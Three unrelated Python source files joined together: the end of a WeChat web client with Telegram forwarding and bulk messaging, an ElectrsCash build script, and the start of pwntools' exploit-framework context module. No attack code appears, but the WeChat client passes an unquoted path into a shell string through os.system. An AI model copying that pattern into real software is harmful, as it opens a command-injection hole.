self.forwardToTelegram(self.formatMsg(raw_msg))
def forwardToTelegram(self, msg):
'''Forward a msg to Telegram'''
if getattr(self, 'telegram_adapter', None) is None:
# No adapter has been set, can't do anything
return
self.telegram_adapter.send(msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
self.forwardToTelegram(_unicode_dict({
'body': '消息转发已经停止,你可能在手机上登出了微信',
'time': time.time(),
'from': 'WeChatForwardBot',
}))
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
self.forwardToTelegram(_unicode_dict({
'body': '消息转发已经停止,你可能在其他地方登录了 WEB 版微信',
'time': time.time(),
'from': 'WeChatForwardBot',
}))
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
mat = qr.get_matrix()
self._printQR(mat) # qr.print_tty() or qr.print_ascii()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
e = None
try:
logging.debug(url)
response = urllib2.urlopen(request)
data = response.read()
except Exception as e:
logging.error(e, exc_info=True)
while e is not None:
try:
logging.debug(url)
response = urllib2.urlopen(request)
data = response.read()
break
except Exception as e:
logging.error(e, exc_info=True)
return data
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
e = None
try:
response = urllib2.urlopen(request)
data = response.read()
except Exception as e:
while e is not None:
try:
response = urllib2.urlopen(request)
data = response.read()
break
except Exception as e:
logging.error(e, exc_info=True)
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
build_electrs.py
|
#!/usr/bin/env python3
import argparse
import logging
import os
import sys
import shutil
PROJECT_NAME = "ElectrsCash"
GIT_REPO = "https://github.com/BitcoinUnlimited/{}.git".format(PROJECT_NAME)
GIT_BRANCH = "v1.0.0"
EXPECT_HEAD = "aa95d64d050c286356dadb78d19c2e687dec85cf"
ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
ELECTRS_DIR = os.path.join(ROOT_DIR, PROJECT_NAME)
ELECTRS_BIN = "electrscash"
parser = argparse.ArgumentParser()
parser.add_argument('--allow-modified', help='Allow building modified/dirty repo',
action = "store_true")
parser.add_argument('--verbose', help='Sets log level to DEBUG',
action = "store_true")
parser.add_argument('--dst', help='Where to copy produced binary',
default=os.path.join(ROOT_DIR, "src"))
parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)',
default="x86_64-unknown-linux-gnu")
parser.add_argument('--debug', help="Do a debug build", action = "store_true")
args = parser.parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s',
level=level,
stream=sys.stdout)
def bail(*args):
logging.error(*args)
sys.exit(1)
def check_dependencies():
v = sys.version_info
if v[0] < 3 or (v[0] == 3 and v[1] < 3):
bail("python >= 3.3 required");
try:
import git
except Exception as e:
logging.error("Failed to 'import git'")
logging.error("Tip: On Debian/Ubuntu you need to install python3-git")
bail(str(e))
import shutil
if shutil.which("cargo") is None:
logging.error("Cannot find 'cargo', will not be able to build {}".format(PROJECT_NAME))
logging.error("You need to install rust (1.34+) https://rustup.rs/")
logging.error("Tip: On Debian/Ubuntu you need to install cargo")
bail("rust not found")
if shutil.which("clang") is None:
logging.error("Cannot find 'clang', will not be able to build {}".format(PROJECT_NAME))
logging.error("Tip: On Debian/Ubuntu you need to install clang")
bail("clang not found")
if not os.path.isdir(args.dst):
bail("--dst provided '%s' is not a directory", args.dst)
def clone_repo():
import git
logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR)
repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH)
def verify_repo(allow_modified):
import git
repo = git.Repo(ELECTRS_DIR)
if repo.is_dirty():
logging.error("Validation failed - %s has local modifications.", ELECTRS_DIR)
allow_modified or bail("Bailing")
if repo.head.object.hexsha != EXPECT_HEAD:
# TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD
logging.error("Validation failed - %s HEAD differs from expected (%s vs %s)",
PROJECT_NAME, repo.head.object.hexsha, EXPECT_HEAD)
allow_modified or bail("Bailing")
def output_reader(pipe, queue):
try:
with pipe:
for l in iter(pipe.readline, b''):
queue.put(l)
finally:
queue.put(None)
def cargo_run(args):
import subprocess
from threading import Thread
from queue import Queue
cargo = shutil.which("cargo")
args = [cargo] + args
logging.info("Running %s", args)
assert cargo is not None
p = subprocess.Popen(args, cwd = ELECTRS_DIR,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
q = Queue()
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.info(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
bail("cargo failed with return code %s", rc)
def get_target(makefile_target):
# Try to map target passed from makefile to the equalent in rust
# To see supported targets, run: rustc --print target-list
target_map = {
'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu',
'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu'
}
if makefile_target in target_map:
return target_map[makefile_target]
if makefile_target in target_map.values():
return makefile_target
logging.warn("Target %s is not mapped, passing it rust and hoping it works"
% makefile_target)
return makefile_target
check_dependencies()
if not os.path.exists(ELECTRS_DIR):
clone_repo()
verify_repo(args.allow_modified)
def build_flags(debug, target):
flags = ["--target={}".format(get_target(target))]
if debug:
return flags
return flags + ["--release"]
cargo_run(["build", "--verbose", "--locked"] + build_flags(args.debug, args.target))
cargo_run(["test", "--verbose", "--locked"] + build_flags(args.debug, args.target))
def build_dir(debug):
if debug:
return "debug"
return "release"
src = os.path.join(ELECTRS_DIR, "target", get_target(args.target), build_dir(args.debug), ELECTRS_BIN)
logging.info("Copying %s to %s", src, args.dst)
shutil.copy(src, args.dst)
logging.info("Done")
|
__init__.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
from __future__ import absolute_import
import collections
import functools
import logging
import os
import platform
import socket
import stat
import string
import subprocess
import sys
import threading
import time
import socks
from pwnlib.config import register_config
from pwnlib.device import Device
from pwnlib.timeout import Timeout
__all__ = ['context', 'ContextType', 'Thread']
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is neccesary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print t
{'key': 'value'}
>>> def p(): print t
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that is tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherit its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class`threading`.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print context.arch
... context.arch = 'mips'
... print context.arch
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print context.arch
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print context.arch
arm
Implementation Details:
This class implemented by hooking the private function
:func:`threading.Thread._Thread_bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
super(Thread, self).__bootstrap()
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> pwnlib.context._longest(data) == data
True
>>> for i in pwnlib.context._longest(data):
... print i
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
def TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable :data:`.context`, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print pwnlib.asm.asm('nop').encode('hex')
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
'arch': 'i386',
'aslr': True,
'binary': None,
'bits': 32,
'buffer_size': 4096,
'cyclic_alphabet': string.ascii_lowercase,
'cyclic_size': 4,
'delete_corefiles': False,
'device': os.getenv('ANDROID_SERIAL', None) or None,
'endian': 'little',
'gdbinit': "",
'kernel': None,
'log_level': logging.INFO,
'log_file': _devnull(),
'log_console': sys.stdout,
'randomize': False,
'rename_corefiles': True,
'newline': '\n',
'noptrace': False,
'os': 'linux',
'proxy': None,
'signed': False,
'terminal': tuple(),
'timeout': Timeout.maximum,
}
#: Valid values for :meth:`pwnlib.context.ContextType.os`
oses = sorted(('linux','freebsd','windows','cgc','android'))
big_32 = {'endian': 'big', 'bits': 32}
big_64 = {'endian': 'big', 'bits': 64}
little_8 = {'endian': 'little', 'bits': 8}
little_16 = {'endian': 'little', 'bits': 16}
little_32 = {'endian': 'little', 'bits': 32}
little_64 = {'endian': 'little', 'bits': 64}
#: Keys are valid values for :meth:`pwnlib.context.ContextType.arch`.
#
#: Values are defaults which are set when
#: :attr:`pwnlib.context.ContextType.arch` is set
architectures = _longest({
'aarch64': little_64,
'alpha': little_64,
'avr': little_8,
'amd64': little_64,
'arm': little_32,
'cris': little_32,
'i386': little_32,
'ia64': big_64,
'm68k': big_32,
'mips': little_32,
'mips64': little_64,
'msp430': little_16,
'powerpc': big_32,
'powerpc64': big_64,
's390': big_32,
'sparc': big_32,
'sparc64': big_64,
'thumb': little_32,
'vax': little_32,
})
#: Valid values for :attr:`endian`
endiannesses = _longest({
'be': 'big',
'eb': 'big',
'big': 'big',
'le': 'little',
'el': 'little',
'little': 'little'
})
#: Valid string values for :attr:`signed`
signednesses = {
'unsigned': False,
'no': False,
'yes': True,
'signed': True
}
valid_signed = sorted(signednesses)
def __init__(self, **kwargs):
"""
Initialize the ContextType structure.
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self.update(**kwargs)
def copy(self):
"""copy() -> dict
Returns a copy of the current context as a dictionary.
Examples:
>>> context.clear()
>>> context.os = 'linux'
>>> vars(context) == {'os': 'linux'}
True
"""
return self._tls.copy()
@property
def __dict__(self):
return self.copy()
def update(self, *args, **kwargs):
"""
Convenience function, which is shorthand for setting multiple
variables at once.
It is a simple shorthand such that::
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to::
context.os = 'linux'
context.arch = 'arm'
...
The following syntax is also valid::
context.update({'os': 'linux', 'arch': 'arm'})
Arguments:
kwargs: Variables to be assigned in the environment.
Examples:
>>> context.clear()
>>> context.update(arch = 'i386', os = 'linux')
>>> context.arch, context.os
('i386', 'linux')
"""
for arg in args:
self.update(**arg)
for k,v in kwargs.items():
setattr(self,k,v)
def __repr__(self):
v = sorted("%s = %r" % (k,v) for k,v in self._tls._current.items())
return '%s(%s)' % (self.__class__.__name__, ', '.join(v))
def local(self, function=None, **kwargs):
"""local(**kwargs) -> context manager
Create a context manager for use with the ``with`` statement.
For more information, see the example below or PEP 343.
Arguments:
kwargs: Variables to be assigned in the new environment.
Returns:
ContextType manager for managing the old and new environment.
Examples:
>>> context.clear()
>>> context.timeout = 1
>>> context.timeout == 1
True
>>> print context.timeout
1.0
>>> with context.local(timeout = 2):
... print context.timeout
... context.timeout = 3
... print context.timeout
2.0
3.0
>>> print context.timeout
1.0
"""
class LocalContext(object):
def __enter__(a):
self._tls.push()
self.update(**{k:v for k,v in kwargs.items() if v is not None})
return self
def __exit__(a, *b, **c):
self._tls.pop()
def __call__(self, function, *a, **kw):
@functools.wraps(function)
def inner(*a, **kw):
with self:
return function(*a, **kw)
return inner
return LocalContext()
@property
def silent(self, function=None):
"""Disable all non-error logging within the enclosed scope.
"""
return self.local(function, log_level='error')
@property
def quiet(self, function=None):
"""Disables all non-error logging within the enclosed scope,
*unless* the debugging level is set to 'debug' or lower."""
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
return self.local(function, log_level=level)
def quietfunc(self, function):
"""Similar to :attr:`quiet`, but wraps a whole function."""
@functools.wraps(function)
def wrapper(*a, **kw):
level = 'error'
if context.log_level <= logging.DEBUG:
level = None
with self.local(function, log_level=level):
return function(*a, **kw)
return wrapper
@property
def verbose(self):
"""Enable all logging within the enclosed scope.
"""
return self.local(log_level='debug')
def clear(self, *a, **kw):
"""
Clears the contents of the context.
All values are set to their defaults.
Arguments:
a: Arguments passed to ``update``
kw: Arguments passed to ``update``
Examples:
>>> # Default value
>>> context.clear()
>>> context.arch == 'i386'
True
>>> context.arch = 'arm'
>>> context.arch == 'i386'
False
>>> context.clear()
>>> context.arch == 'i386'
True
"""
self._tls._current.clear()
if a or kw:
self.update(*a, **kw)
@property
def native(self):
if context.os in ('android', 'cgc'):
return False
arch = context.arch
with context.local(arch = platform.machine()):
platform_arch = context.arch
if arch in ('i386', 'amd64') and platform_arch in ('i386', 'amd64'):
return True
return arch == platform_arch
@_validator
def arch(self, arch):
"""
Target binary architecture.
Allowed values are listed in :attr:`pwnlib.context.ContextType.architectures`.
Side Effects:
If an architecture is specified which also implies additional
attributes (e.g. 'amd64' implies 64-bit words, 'powerpc' implies
big-endian), these attributes will be set on the context if a
user has not already set a value.
The following properties may be modified.
- :attr:`bits`
- :attr:`endian`
Raises:
AttributeError: An invalid architecture was specified
Examples:
>>> context.clear()
>>> context.arch == 'i386' # Default architecture
True
>>> context.arch = 'mips'
>>> context.arch == 'mips'
True
>>> context.arch = 'doge' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc'
>>> context.arch == 'powerpc' # Aliased architecture
True
>>> context.clear()
>>> context.bits == 32 # Default value
True
>>> context.arch = 'amd64'
>>> context.bits == 64 # New value
True
Note that expressly setting :attr:`bits` means that we use
that value instead of the default
>>> context.clear()
>>> context.bits = 32
>>> context.arch = 'amd64'
>>> context.bits == 32
True
Setting the architecture can override the defaults for
both :attr:`endian` and :attr:`bits`
>>> context.clear()
>>> context.arch = 'powerpc64'
>>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'}
True
"""
# Lowercase
arch = arch.lower()
# Attempt to perform convenience and legacy compatibility transformations.
# We have to make sure that x86_64 appears before x86 for this to work correctly.
transform = [('ppc64', 'powerpc64'),
('ppc', 'powerpc'),
('x86_64', 'amd64'),
('x86', 'i386'),
('i686', 'i386'),
('armeabi', 'arm'),
('arm64', 'aarch64')]
for k, v in transform:
if arch.startswith(k):
arch = v
break
try:
defaults = ContextType.architectures[arch]
except KeyError:
raise AttributeError('AttributeError: arch must be one of %r' % sorted(ContextType.architectures))
for k,v in ContextType.architectures[arch].items():
if k not in self._tls:
self._tls[k] = v
return arch
@_validator
def aslr(self, aslr):
"""
ASLR settings for new processes.
If :const:`False`, attempt to disable ASLR in all processes which are
created via ``personality`` (``setarch -R``) and ``setrlimit``
(``ulimit -s unlimited``).
The ``setarch`` changes are lost if a ``setuid`` binary is executed.
"""
return bool(aslr)
@_validator
def kernel(self, arch):
"""
Target machine's kernel architecture.
Usually, this is the same as ``arch``, except when
running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with context.local(arch=arch):
return context.arch
@_validator
def bits(self, bits):
"""
Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is ``32``, but changes according to :attr:`arch`.
Examples:
>>> context.clear()
>>> context.bits == 32
True
>>> context.bits = 64
>>> context.bits == 64
True
>>> context.bits = -1 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (-1)
"""
bits = int(bits)
if bits <= 0:
raise AttributeError("bits must be > 0 (%r)" % bits)
return bits
@_validator
def binary(self, binary):
"""
Infer target architecture, bit-with, and endianness from a binary file.
Data type is a :class:`pwnlib.elf.ELF` object.
Examples:
>>> context.clear()
>>> context.arch, context.bits
('i386', 32)
>>> context.binary = '/bin/bash'
>>> context.arch, context.bits
('amd64', 64)
>>> context.binary
ELF('/bin/bash')
"""
# Cyclic imports... sorry Idolf.
from pwnlib.elf import ELF
if not isinstance(binary, ELF):
binary = ELF(binary)
self.arch = binary.arch
self.bits = binary.bits
self.endian = binary.endian
self.os = binary.os
return binary
@property
def bytes(self):
"""
Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around ``bits / 8``.
Examples:
>>> context.bytes = 1
>>> context.bits == 8
True
>>> context.bytes = 0 #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: bits must be > 0 (0)
"""
return self.bits/8
@bytes.setter
def bytes(self, value):
self.bits = value*8
@_validator
def endian(self, endianness):
"""
Endianness of the target machine.
The default value is ``'little'``, but changes according to :attr:`arch`.
Raises:
AttributeError: An invalid endianness was provided
Examples:
>>> context.clear()
>>> context.endian == 'little'
True
>>> context.endian = 'big'
>>> context.endian
'big'
>>> context.endian = 'be'
>>> context.endian == 'big'
True
>>> context.endian = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
"""
endian = endianness.lower()
if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
return ContextType.endiannesses[endian]
@_validator
def log_level(self, value):
"""
Sets the verbosity of ``pwntools`` logging mechanism.
More specifically it controls the filtering of messages that happens
inside the handler for logging to the screen. So if you want e.g. log
all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python ``logging`` module.
Default value is set to ``INFO``.
Examples:
>>> context.log_level = 'error'
>>> context.log_level == logging.ERROR
True
>>> context.log_level = 10
>>> context.log_level = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
"""
# If it can be converted into an int, success
try: return int(value)
except ValueError: pass
# If it is defined in the logging module, success
try: return getattr(logging, value.upper())
except AttributeError: pass
# Otherwise, fail
level_names = filter(lambda x: isinstance(x,str), logging._levelNames)
permitted = sorted(level_names)
raise AttributeError('log_level must be an integer or one of %r' % permitted)
@_validator
def log_file(self, value):
r"""
Sets the target file for all logging output.
Works in a similar fashion to :attr:`log_level`.
Examples:
>>> context.log_file = 'foo.txt' #doctest: +ELLIPSIS
>>> log.debug('Hello!') #doctest: +ELLIPSIS
>>> with context.local(log_level='ERROR'): #doctest: +ELLIPSIS
... log.info('Hello again!')
>>> with context.local(log_file='bar.txt'):
... log.debug('Hello from bar!')
